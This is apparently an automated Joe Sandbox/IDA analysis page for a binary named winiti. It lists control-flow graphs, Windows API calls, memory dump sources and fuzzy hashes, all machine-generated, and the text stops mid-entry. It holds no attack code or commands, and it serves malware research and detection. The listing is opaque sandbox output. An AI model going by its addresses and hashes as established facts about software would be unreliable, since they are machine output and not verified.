                  control_flow_graph 119 13fde2080-13fde20b1 120 13fde216f-13fde218c GlobalMemoryStatusEx 119->120 121 13fde20b7-13fde20d2 GetCurrentProcess call 13fe38be5 119->121 122 13fde2212-13fde2215 120->122 123 13fde2192-13fde2195 120->123 121->120 130 13fde20d8-13fde20e0 121->130 128 13fde221e-13fde2221 122->128 129 13fde2217-13fde221b 122->129 126 13fde2197-13fde21a2 123->126 127 13fde2201-13fde2204 123->127 131 13fde21ab-13fde21bc 126->131 132 13fde21a4-13fde21a9 126->132 133 13fde2209-13fde220c 127->133 134 13fde2206 127->134 135 13fde222b-13fde222e 128->135 136 13fde2223-13fde2228 128->136 129->128 139 13fde214a-13fde214f 130->139 140 13fde20e2-13fde20e8 130->140 141 13fde21c0-13fde21d1 131->141 132->141 138 13fde2238-13fde225b call 13fe38fb0 133->138 142 13fde220e-13fde2210 133->142 134->133 137 13fde2230 135->137 135->138 136->135 143 13fde2235 137->143 149 13fde2161-13fde2164 139->149 150 13fde2151-13fde2154 139->150 144 13fde20ea-13fde20ef 140->144 145 13fde20f1-13fde2105 140->145 147 13fde21da-13fde21ee 141->147 148 13fde21d3-13fde21d8 141->148 142->143 143->138 151 13fde2109-13fde211a 144->151 145->151 153 13fde21f2-13fde21fe 147->153 148->153 149->138 156 13fde216a 149->156 154 13fde215b-13fde215e 150->154 155 13fde2156-13fde2159 150->155 157 13fde211c-13fde2121 151->157 158 13fde2123-13fde2137 151->158 153->127 154->149 155->149 156->143 159 13fde213b-13fde2147 157->159 158->159 159->139
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: CurrentGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3261791682-2766056989
                  • Opcode ID: 9126c160c7f3f8a979c28d89de266492a2cb26c761d1c6b8a32731156d037bec
                  • Instruction ID: 6cbde7d94e6c0cf4b3a80eb2cb1af277c1c132f4f69480687a0e135cf7c325ad
                  • Opcode Fuzzy Hash: 9126c160c7f3f8a979c28d89de266492a2cb26c761d1c6b8a32731156d037bec
                  • Instruction Fuzzy Hash: C8412672F01B4541F956CF7692183A99252BB69BC1F18C739AE0E77744FB39C7938600
                  Function 000000013FE01660 Relevance: 5.1, APIs: 4, Instructions: 112COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 205 13fe01660-13fe0168b 206 13fe016bc 205->206 207 13fe0168d-13fe01691 205->207 208 13fe016be-13fe016dd 206->208 207->206 209 13fe01693-13fe01697 207->209 210 13fe016e3-13fe016fe EnterCriticalSection 208->210 211 13fe01767-13fe01775 208->211 209->206 212 13fe01699-13fe0169d 209->212 213 13fe01727-13fe01732 210->213 214 13fe01700-13fe0171f 210->214 215 13fe01778-13fe0177a 211->215 216 13fe016b5-13fe016ba 212->216 217 13fe0169f-13fe016a3 212->217 220 13fe017b1-13fe017b8 LeaveCriticalSection 213->220 222 13fe01734-13fe01742 213->222 214->220 221 13fe01725 214->221 223 13fe017c1-13fe01812 call 13fdfe7a0 215->223 224 13fe0177c-13fe01788 call 13fde2930 215->224 216->208 218 13fe016a5-13fe016ac 217->218 219 13fe016ae-13fe016b3 217->219 218->208 219->208 225 13fe017bd-13fe017bf 220->225 227 13fe01745-13fe01765 LeaveCriticalSection 221->227 222->227 229 13fe01815-13fe01833 223->229 231 13fe0178d-13fe0178f 224->231 225->229 227->215 231->223 232 13fe01791-13fe01799 231->232 232->225 233 13fe0179b-13fe017aa EnterCriticalSection 232->233 233->220
                  APIs
                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,000000013FDED516,?,-8000000000000000,00000001,000000013FDFC6D6), ref: 000000013FE016EA
                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,000000013FDED516,?,-8000000000000000,00000001,000000013FDFC6D6), ref: 000000013FE01759
                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,000000013FDED516,?,-8000000000000000,00000001,000000013FDFC6D6), ref: 000000013FE017A2
                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,000000013FDED516,?,-8000000000000000,00000001,000000013FDFC6D6), ref: 000000013FE017B8
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID:
                  • API String ID: 3168844106-0
                  • Opcode ID: 0430e5036a9640feed12229f19debff97727073d71a72808b7631fa93863536e
                  • Instruction ID: f3bffc438486ad61274dee272708329de89d6a11b24b158af4155c7c795729ac
                  • Opcode Fuzzy Hash: 0430e5036a9640feed12229f19debff97727073d71a72808b7631fa93863536e
                  • Instruction Fuzzy Hash: 51514F35A08A4181EA26CF52FC943E973A0F75A7D4F59423AEA5D47AB5CB3CC756C300
                  Function 000000013FE104D0 Relevance: 5.1, APIs: 4, Instructions: 84COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 234 13fe104d0-13fe10503 235 13fe105a1-13fe105a3 234->235 236 13fe10509-13fe10527 EnterCriticalSection 234->236 237 13fe105b2-13fe105c1 call 13fde2930 235->237 238 13fe105a5-13fe105ac 235->238 239 13fe10529-13fe1052c 236->239 240 13fe10550-13fe1055b 236->240 247 13fe105c6-13fe105cb 237->247 238->237 241 13fe105ae-13fe105b0 238->241 243 13fe10562-13fe10576 239->243 244 13fe1052e-13fe10549 239->244 240->243 245 13fe1055d-13fe10560 240->245 246 13fe1060d-13fe10625 241->246 249 13fe1057f-13fe10593 LeaveCriticalSection 243->249 250 13fe10578 243->250 244->243 248 13fe1054b-13fe1054e 244->248 245->249 247->246 251 13fe105cd-13fe105d5 247->251 248->249 252 13fe10595 249->252 253 13fe10598-13fe1059b 249->253 250->249 251->246 255 13fe105d7-13fe105f4 EnterCriticalSection 251->255 252->253 253->235 254 13fe1059d-13fe1059f 253->254 254->246 256 13fe105f6 255->256 257 13fe105fd-13fe10609 LeaveCriticalSection 255->257 256->257 257->246
                  APIs
                  • EnterCriticalSection.KERNEL32(?,00000000,00000001,000000013FDFDA29), ref: 000000013FE10510
                  • LeaveCriticalSection.KERNEL32(?,00000000,00000001,000000013FDFDA29), ref: 000000013FE10586
                  • EnterCriticalSection.KERNEL32(?,00000000,00000001,000000013FDFDA29), ref: 000000013FE105DE
                  • LeaveCriticalSection.KERNEL32(?,00000000,00000001,000000013FDFDA29), ref: 000000013FE10604
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID:
                  • API String ID: 3168844106-0
                  • Opcode ID: 49907da951615bb056f4715dd605aad2ff44e51d4236cc1df112cb9915273893
                  • Instruction ID: c43f0dbb90059c57102601ee3645260c84d75fa9400f2f86668015cf3d8ca442
                  • Opcode Fuzzy Hash: 49907da951615bb056f4715dd605aad2ff44e51d4236cc1df112cb9915273893
                  • Instruction Fuzzy Hash: 4A415D71A08A5491FA23DF13E8843EA73A4F76A7C1F860539EB49476B5DB7CC682C310
                  Function 000000013FDECF30 Relevance: 4.7, APIs: 3, Instructions: 195threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 258 13fdecf30-13fdecf5d 259 13fdecf5f 258->259 260 13fdecf66-13fdecf6e 259->260 261 13fdecf70-13fdecf7a call 13fe10880 260->261 262 13fdecf7c-13fdecf9c 260->262 261->259 264 13fded093-13fded099 262->264 265 13fdecfa2-13fdecfa8 262->265 269 13fded09b-13fded0a1 call 13fdf3670 264->269 270 13fded0a6-13fded0a9 264->270 267 13fded07d-13fded088 265->267 268 13fdecfae 265->268 267->265 273 13fded08e 267->273 274 13fdecfb0-13fdecfb6 268->274 269->270 271 13fded0af-13fded0b6 270->271 272 13fded16a-13fded174 call 13fe04b90 270->272 276 13fded0bc-13fded0c4 271->276 277 13fded161-13fded168 271->277 290 13fded1dc-13fded1df 272->290 291 13fded176-13fded17c 272->291 273->264 279 13fdecfb8-13fdecfc0 274->279 280 13fded022-13fded032 call 13fdd9750 274->280 276->277 281 13fded0ca-13fded0f4 276->281 277->272 282 13fded112-13fded126 call 13fdedbe0 277->282 279->280 285 13fdecfc2-13fdecfc9 279->285 301 13fded056-13fded05e 280->301 302 13fded034-13fded03b 280->302 281->277 288 13fded0f6-13fded10d call 13fe0e2b0 281->288 296 13fded12b-13fded135 282->296 286 13fdecfcb-13fdecfd8 285->286 287 13fded019-13fded020 SwitchToThread 285->287 293 13fdecfda 286->293 294 13fdecff8-13fdecffc 286->294 297 13fded073-13fded077 287->297 288->282 290->282 298 13fded1e5-13fded1fd call 13fded660 290->298 299 13fded18d-13fded19d call 13fe106c0 291->299 300 13fded17e-13fded181 291->300 303 13fdecfe0-13fdecfe4 293->303 294->297 307 13fdecffe-13fded006 294->307 296->260 308 13fded13b-13fded160 296->308 297->267 297->274 298->296 323 13fded19f-13fded1a9 call 13fe04b90 299->323 324 13fded1ab-13fded1b1 299->324 300->299 310 13fded183-13fded188 call 13fdf3670 300->310 305 13fded060-13fded065 call 13fe10880 301->305 306 13fded06a-13fded06c 301->306 311 13fded03d-13fded043 302->311 312 13fded04c-13fded051 call 13fde28e0 302->312 303->294 316 13fdecfe6-13fdecfee 303->316 305->306 306->297 319 13fded06e call 13fdd96d0 306->319 307->297 320 13fded008-13fded017 call 13fdd9750 SwitchToThread 307->320 310->299 311->312 314 13fded045-13fded04a SwitchToThread 311->314 312->301 314->301 316->294 322 13fdecff0-13fdecff6 316->322 319->297 320->306 322->294 322->303 323->290 323->324 328 13fded1bc-13fded1d7 call 13fe0e2b0 324->328 329 13fded1b3-13fded1b6 324->329 328->290 329->282 329->328
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: SwitchThread
                  • String ID:
                  • API String ID: 115865932-0
                  • Opcode ID: b53c1b8baf3fa961f42f9a93c026e3a91cc4469665a52e1080013d420c1a925c
                  • Instruction ID: eef52e2a6ef1e40c188b4447e1643330802c6adf8eb01af30b5675ce26e5ea4e
                  • Opcode Fuzzy Hash: b53c1b8baf3fa961f42f9a93c026e3a91cc4469665a52e1080013d420c1a925c
                  • Instruction Fuzzy Hash: CB71D231B0020286FB66AF96E9497EA2391BB647D4F04013DFE19972E9DF39CA43D700
                  Function 000000013FDE2930 Relevance: 4.5, APIs: 3, Instructions: 34memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • VirtualAlloc.KERNELBASE(?,?,?,?,00000000,000000013FDE5348,?,?,0000000A,000000013FDE43A0,?,?,00000000,000000013FDDEA91), ref: 000000013FDE2957
                  • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,000000013FDE5348,?,?,0000000A,000000013FDE43A0,?,?,00000000,000000013FDDEA91), ref: 000000013FDE2977
                  • VirtualAllocExNuma.KERNEL32 ref: 000000013FDE2998
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: AllocVirtual$CurrentNumaProcess
                  • String ID:
                  • API String ID: 647533253-0
                  • Opcode ID: 686b3994b09b840201f1684b8296069bddec3b68bb7cd25d79b3609eb5cb6e8f
                  • Instruction ID: aa6897ca42bc0b9267c8f05918eb2316bc02c96353b43b00398aee0318a2a711
                  • Opcode Fuzzy Hash: 686b3994b09b840201f1684b8296069bddec3b68bb7cd25d79b3609eb5cb6e8f
                  • Instruction Fuzzy Hash: 8BF06272B14690C2EB208F26F40475AA760BB49FD5F584139EF8C17B58DB3DC6928B04
                  Function 000000013FDD9F40 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: EventRegister
                  • String ID: gcConservative
                  • API String ID: 3840811365-1953527212
                  • Opcode ID: 0bd704104a13a76449dc93aebda2a80e695e757360b9318b75be9f098cee9c4f
                  • Instruction ID: cd7004de79b0c52b3982eadcf4cc4a58fd4ebfabc35e283b2789982290135b85
                  • Opcode Fuzzy Hash: 0bd704104a13a76449dc93aebda2a80e695e757360b9318b75be9f098cee9c4f
                  • Instruction Fuzzy Hash: 6C317E31600B4A92FB12DF9AE985BD633A0FB497C4F40552AFB4D032B2DB39C64AD740
                  Function 000000013FE38ED4 Relevance: 3.0, APIs: 2, Instructions: 21COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 361 13fe38ed4-13fe38edd 362 13fe38eee-13fe38ef6 malloc 361->362 363 13fe38ef8-13fe38efd 362->363 364 13fe38edf-13fe38ee9 call 13fe406d3 362->364 367 13fe38eeb 364->367 368 13fe38efe-13fe38f02 364->368 367->362 369 13fe38f04-13fe38f09 call 13fe39a2c 368->369 370 13fe38f0a-13fe38f0f call 13fe39a4c 368->370 369->370
                  APIs
                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000000013FE38FD9,?,?,?,?,000000013FDDDBC1,?,?,?,000000013FDDE13C,00000000,00000020,?), ref: 000000013FE38EEE
                  • Concurrency::cancel_current_task.LIBCPMT ref: 000000013FE38F04
                    • Part of subcall function 000000013FE39A2C: std::bad_alloc::bad_alloc.LIBCMT ref: 000000013FE39A35
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
                  • String ID:
                  • API String ID: 205171174-0
                  • Opcode ID: b0e683634f6cf977cd568e859ab9fb6e1e75df7de34bcf169af656f9c50744c0
                  • Instruction ID: 63dd8b6169fcafdd9835402df0ae5b0004d9e3e27d86b2b299866d146ce1ad37
                  • Opcode Fuzzy Hash: b0e683634f6cf977cd568e859ab9fb6e1e75df7de34bcf169af656f9c50744c0
                  • Instruction Fuzzy Hash: EFE01772E1210A46FD2866775E6E3E900818F48370E2F1B7E5D36086F3AA248B9B8210
                  Function 000000013FDDB2E0 Relevance: 3.0, APIs: 2, Instructions: 18threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 375 13fddb2e0-13fddb302 CreateThread 376 13fddb309-13fddb318 CloseHandle 375->376 377 13fddb304-13fddb308 375->377
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: CloseCreateHandleThread
                  • String ID:
                  • API String ID: 3032276028-0
                  • Opcode ID: 10e2c95deb48a9fa91c132fa6e8d2868e379d5a6b0bea3614ebc36bd565de11c
                  • Instruction ID: 6bda3dbe255533609f5a910cfef3119dc45450e6b5d80bd7841ac54a85dd480e
                  • Opcode Fuzzy Hash: 10e2c95deb48a9fa91c132fa6e8d2868e379d5a6b0bea3614ebc36bd565de11c
                  • Instruction Fuzzy Hash: 4AD012B6F0174082DB14EF75680535517D5BB98B54F85413CAE4D93320FE3C83168900
                  Function 000000013FDF6690 Relevance: 2.6, APIs: 2, Instructions: 107COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID:
                  • API String ID: 3168844106-0
                  • Opcode ID: 1a22502bf992a24a703f73c6a817279700c5c49892520407a1fa6d59b5a26f00
                  • Instruction ID: b0b01d8085f2db665bc11bcc0b391e81e22eca36696b859ab90e9dedfe77ed03
                  • Opcode Fuzzy Hash: 1a22502bf992a24a703f73c6a817279700c5c49892520407a1fa6d59b5a26f00
                  • Instruction Fuzzy Hash: 6641B071610B4085EB128F6AE8547E633A1E759BF4F041339EA3847BE9DB38C546C340
                  Function 000000013FDDFE40 Relevance: 2.6, APIs: 2, Instructions: 86memoryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 81eb4f473b5f6baa680c7093f92d2b26f8a37406559a141903ec7adff4e5ed1f
                  • Instruction ID: d393e43c255db237c99054df050ae6c3dbea4a0ebd6a327c36af7fd96f16d6c3
                  • Opcode Fuzzy Hash: 81eb4f473b5f6baa680c7093f92d2b26f8a37406559a141903ec7adff4e5ed1f
                  • Instruction Fuzzy Hash: 2131C432B01B5482EA15DB66951439A63E4FB49FD4F048539EF5C1BBD4EF38C6638340
                  Function 000000013FE10630 Relevance: 2.5, APIs: 2, Instructions: 28COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 000000013FDE29C0: VirtualFree.KERNELBASE ref: 000000013FDE29CA
                  • EnterCriticalSection.KERNEL32(?,?,?,000000013FDF66E9,?,?,?,000000013FDFC70D), ref: 000000013FE10662
                  • LeaveCriticalSection.KERNEL32(?,?,?,000000013FDF66E9,?,?,?,000000013FDFC70D), ref: 000000013FE1068C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterFreeLeaveVirtual
                  • String ID:
                  • API String ID: 1320683145-0
                  • Opcode ID: 104b6b8d726536473a8dfb620195b120dc1c760eb9325624558afd6144496d8f
                  • Instruction ID: 60004adc6470c90660bf12f838e03f53e3edd7d62a112892d97098ac4ae5fab4
                  • Opcode Fuzzy Hash: 104b6b8d726536473a8dfb620195b120dc1c760eb9325624558afd6144496d8f
                  • Instruction Fuzzy Hash: BAF03C32D0865080E6129B17FDC43EA23B0E3597D1F455139EB59439B58B38CA96C700
                  Function 000000013FDE28F0 Relevance: 2.5, APIs: 2, Instructions: 17memoryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: 39155d9e0f21e472d4726bd40e7b7375b22274d9dbcec4a77f59ee3cc5932518
                  • Instruction ID: 56981225ee6e370abbe0924a1d1f80172b061a91b7465544e907178ebb44cc2c
                  • Opcode Fuzzy Hash: 39155d9e0f21e472d4726bd40e7b7375b22274d9dbcec4a77f59ee3cc5932518
                  • Instruction Fuzzy Hash: 94E0C235F1260082FB199B23B88579523916B5DB50FC4802CC90903360DE39825B8F50
                  Function 000000013FDE744E Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: BreakDebug
                  • String ID:
